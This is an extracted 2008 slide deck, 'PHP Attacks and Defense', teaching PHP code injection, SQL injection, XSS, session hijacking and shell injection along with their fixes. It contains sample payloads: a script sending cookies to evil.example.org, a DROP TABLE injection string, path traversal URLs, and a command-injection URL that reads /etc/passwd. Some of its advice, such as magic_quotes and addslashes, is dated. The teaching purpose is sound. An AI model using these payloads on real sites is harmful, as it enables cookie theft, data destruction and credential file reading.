1. 1
PHP Attacks and Defense
K.Bala Vignesh
kbalavignesh@gmail.com

2. 2
Most Secured computer in the
WORLD
No Need to secure the OS
No Need to secure the S/W
No need to do Anything
It's Naturally Secured

3. 3
Even No Need to Switch ON

4. 4
Web ­Security
?
PHP ?

5. 5
Fact : 1
PHP Mainly for
Web Programs
Fact : 2
Easy To Learn

6. 6
PHP: 20,917,850 domains,
1,224,183 IP addresses
Fact : 3
Fact : 4
More Flexible Functions

7. 7
Few Named threats
Code Injection
SQL Injection
Cross Site Script (XSS)
Session Hijacking
Session Fixation
Temp Files abuse
Remote Execution
More and More unNamed threats...

8. 8
Code Injection

9. Code Injection
9
Dont directly pass the filenames
$filename = $_REQUEST['message'];
$message = file_get_contents($filename);
print $message;
This is ok:
http://example.com/myscript.php?message=hello.txt
But what if I do like this?:
http://example.com/myscript.php?message=passwords.txt

10. Code Injection
10
This is especially important for includes, require
and require_once
$module = $_REQUEST['module'];
include(“lib/$module”);
This is ok:
http://example.com/cms?module=login.php
But what if I do like this?:
http://example.com/cms?module=../passwords.ini

11. Defense Code Injection
11
Make sure the value is one
you expected, if not...ERROR!
$requestedModule = $_REQUEST['module'];
switch($requestedModule)
{
case “login”:
$module = “login”; break;
case “logout”:
$module = “logout”; break;
default:
$module = “error”;
}

12. 12
SQL Injection

13. 13
Form to user search ....
$username=$_POST['username'];
$query= "SELECT * FROM users WHERE name = ' “ .$username." ' ;"
If i give ,
$username ­­­a'
or 't'='t
Query will be ,
"SELECT * FROM users WHERE name = ' a' or 't'='t ';"
SQL Injection

14. 14
If i give ,
$username ­­­a';
DROP TABLE users; SELECT * FROM data WHERE name
LIKE '%
Query will be ,
SELECT * FROM users WHERE name = ' a';DROP TABLE users; SELECT *
FROM data WHERE name LIKE '% ';
SQL Injection

15. 15
Use single quotation
eg: "select * from users where user= '.$username.'"
Check types of user submitted values
is_bool(), is_float(), is_numeric(), is_string(), is_int() ,
intval() , settype() ,strlen()
eg: strpos($query , ';')
Escape every questionable character in your query
' " , ; ( ) and keywords "FROM", "LIKE", and "WHERE"
mysql_real_escape_string
SQL Injection
Defense

16. 16
magic_quotes_gpc (default – on ) (deprecation – php 6.0)
If Off use
addslashes
If On , If you don't need
stripslashes
if (get_magic_quotes_gpc()){
$_GET = array_map('stripslashes', $_GET);
$_POST = array_map('stripslashes', $_POST);
$_COOKIE = array_map('stripslashes', $_COOKIE);
}
SQL Injection
Defense

17. 17
Mysql Improved Extension
$query=mysqli_prepare($connection_string, "select * from user where user= ?");
mysqli_stmt_bind_param($query,"s",$username);
mysqli_stmt_execute($query);
s­string
i­integer
d­double
b­binary
PEAR ­DB,
DataObject
SQL Injection
Defense

18. 18
XSS – Cross Site Scripting

19. 19
1.) Inserting scripts
<script>
document.location =
'http://evil.example.org/steal_cookies.php?cookies=' +
document.cookie
</script>
2.) Login
3.) Set Cookies
4.) Executes the scripts
XSS
5.) Steals the cookies

20. 20
Remote control of the client browser
Reveal the value of a cookie
Change links on the page
Redirect to another URI
Render a bogus form
or
Any undesirable action ...
XSS

21. Defense
XSS Encode HTML Entities in All Non­HTML
Output
21
htmlentities()
Eg:
$str = "A 'quote' is <b>bold</b>";
echo htmlentities($str);
Outputs Will be ­>
A 'quote' is &lt;b&gt;bold&lt;/b&gt;
Check the image upload URI (avatar, icon)
parse_url
Eg:
<img src=”http://shopping.example.com/addCart.php?item=123”/>
Show the domain name for User submitted Links
eg.
Not safe ­­>
Hey click this to see my photo <a href=”http://badguys.net”>Bala</a>
safe ­­>
Hey click this to see my photo [badguys.net] Bala

22. 22
Session Hijacking

23. 23
What is Session ID ?

24. 24
Victim
Attacker
Web Server
Session ID= AD238723FD32
Session Hijacking

25. 25
Victim
Attacker
Web Server
Session ID= AD238723FD32
Session ID=
AD238723FD32
Session Hijacking

26. Session Hijacking
26
Network Eavesdropping ­Promiscuous
Mode
If Intranet ?
Use Switch rather than a Hub
If wi­fi
?
WEP ­Weired
Equivalent Privacy
If Internet ?
SSL

27. 27
Session Hijacking
Unwitting Exposure
Sending links
See this item ­­­­http://
store.com/items.php?item=0987
it's O.K , if i send like this,
http://store.com/items.php?item=0987&phpsessid=34223
How to Avoid ?
session.use_trans_sid (turned off by default)
session.use_only_cookies (Defaults to 1 (enabled) since PHP 6.0.)

28. 28
2.) If he clicks, http://unsafesite?SID=3423 3. Shows login page
Victim
Session Fixation
Attacker
Web Server
1.) See this link
http://unsafesite?SID=3423
Set SessionID =3423
session_id($_GET['SID'])
4.) Now Full Access
http://unsafesite?SID=3423

29. 29
Session Hijacking Defense
Use SSL.
Use Cookies Instead of $_GET Variables.
(ini_set ('session.use_only_cookies',TRUE);
ini_set ('session.use_trans_sid',FALSE);
Use Session Timeouts
ini_set('session.cookie_lifetime',1200)
ini_set('session.gc_maxlifetime)
Regenerate IDs for Users with Changed Status
session_regenerate_id

30. 30
Remote Execution

31. Remote Execution
31
Injection of Shell commands
<?php
$filename=$_GET['filename'];
$command='/usr/bin/wc $filename”;
$words=shell_exec ($command);
print “$filename contains $words words.”;
?>
This is ok ...
wordcount.php?filename=textfile.txt
But, What if i give like this ...
wordcount.php?filename=%2Fdev%2Fnull%20%7C%20cat%20%2Fetc%2Fpasswd
(filename ­­>
/dev/null | cat /etc/passwd )
/usr/bin/wc /dev/null |cat /etc/passwd

32. Remote Execution
32
Defense
Allow only Trusted , Human Users to Import Code
Store uploads outside of Web Document Root
Limit allowable filename extensions for upload
Use disable_functions directive
eg:
disable_functions= “eval,phpinfo”
Do not include PHP scripts from Remote Servers
eg:
<?php
include ('http://example.net/code/common.php')
?>
Properly escape all shell commands
escapeshellarg() , escapeshellcmd()

33. 33
Future? ­PHP
6.0
Deprecation
Register Globals
Big security hole
Safe Mode
False sense of security
Magic Quotes
Messed with the data
Upcoming changes and features
http://www.php.net/~derick/meeting­notes.
html
http://www.phphacks.com/content/view/49/33/
Rasmus Lerdorf – PHP 6.0 Wish List
http://news.php.net/php.internals/17883

34. 34
What to do?
Proper Input Validation
Dont do Programming + Security
Do secure Programming
htmlentities, mysql_real_escape_string,
parse_url , addslashes ,escapeshellarg,
escapeshellcmd... etc
SSL
Use PEAR , PECL

35. Images From Flickr.com
35
reference­http://
flickr.com/photos/opinicus/246099418/
remote_boy ­http://
flickr.com/photo_zoom.gne?id=331355695&size=l
level_cross ­http://
flickr.com/photo_zoom.gne?id=67342604&size=o
injection3­http://
flickr.com/photos/fleurdelisa/249435636/
building game1­http://
flickr.com/photo_zoom.gne?id=346575350&size=o
computer_baby1­http://
flickr.com/photo_zoom.gne?id=102207751&size=o
country_border1 ­http://
flickr.com/photo_zoom.gne?id=48740674&size=l
computer_baby ­http://
flickr.com/photo_zoom.gne?id=436594815&size=m
hijack ­http://
flickr.com/photo_zoom.gne?id=463129891&size=l
dog_security ­http://
flickr.com/photo_zoom.gne?id=2205272682&size=l
Id card ­http://
flickr.com/photo_zoom.gne?id=1269802640&size=o

36. 36
Reference
Pro PHP Security
Chris Snyder , Michael Southwell
http://wikipedia.org/
http://www.sitepoint.com/article/php­security­blunders
http://phpsec.org/
WWW.google.com

37. 37

38. 38

39. Copyright (c) 2008
Permission is granted to copy, distribute and/or modify this document
under the terms of the GNU Free Documentation License, Version 1.2
or any later version published by the Free Software Foundation.
http://www.gnu.org/copyleft/fdl.html